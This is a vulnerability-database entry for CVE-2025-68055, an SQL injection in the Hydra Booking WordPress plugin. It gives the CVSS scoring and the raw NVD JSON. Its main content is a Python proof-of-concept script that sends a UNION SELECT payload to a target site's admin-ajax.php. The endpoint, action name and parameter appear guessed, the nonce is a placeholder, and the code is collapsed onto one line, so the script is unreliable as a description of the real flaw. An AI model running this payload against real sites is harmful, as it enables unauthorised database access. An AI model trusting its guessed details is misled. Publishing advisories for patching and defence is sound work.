Security Vulnerability Report
中文
CVE-2025-68055 CVSS 8.5 HIGH

CVE-2025-68055

Published: 2025-12-16 09:16:01
Last Modified: 2026-04-27 19:16:24

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themefic Hydra Booking hydra-booking allows SQL Injection.This issue affects Hydra Booking: from n/a through <= 1.1.32.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Themefic Hydra Booking (hydra-booking) <= 1.1.32

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68055 SQL Injection PoC for Themefic Hydra Booking # Target: WordPress site with Themefic Hydra Booking plugin <= 1.1.32 def exploit_sqli(target_url): """ SQL Injection vulnerability in Hydra Booking plugin This PoC demonstrates how an attacker can extract database information """ # Vulnerable endpoint - typically in admin-ajax.php or plugin's AJAX handler vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Example malicious payload for SQL injection # In real attack, attacker would enumerate database schema payload = { 'action': 'hydra_booking_get_data', 'booking_id': '1 UNION SELECT 1,2,3,4,5,6,7,8--', 'nonce': 'attacker_controlled_or_missing' } try: response = requests.post(vulnerable_endpoint, data=payload, timeout=10) print(f"[*] Sending malicious request to {vulnerable_endpoint}") print(f"[*] Response status: {response.status_code}") if response.status_code == 200: # Check for SQL error messages or successful data extraction if 'SQL' in response.text or len(response.text) > 100: print("[!] Potential SQL injection detected") print(f"[!] Response preview: {response.text[:500]}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68055", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:01.190", "lastModified": "2026-04-27T19:16:23.673", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themefic Hydra Booking hydra-booking allows SQL Injection.This issue affects Hydra Booking: from n/a through <= 1.1.32."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hydra-booking/vulnerability/wordpress-hydra-booking-plugin-1-1-32-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}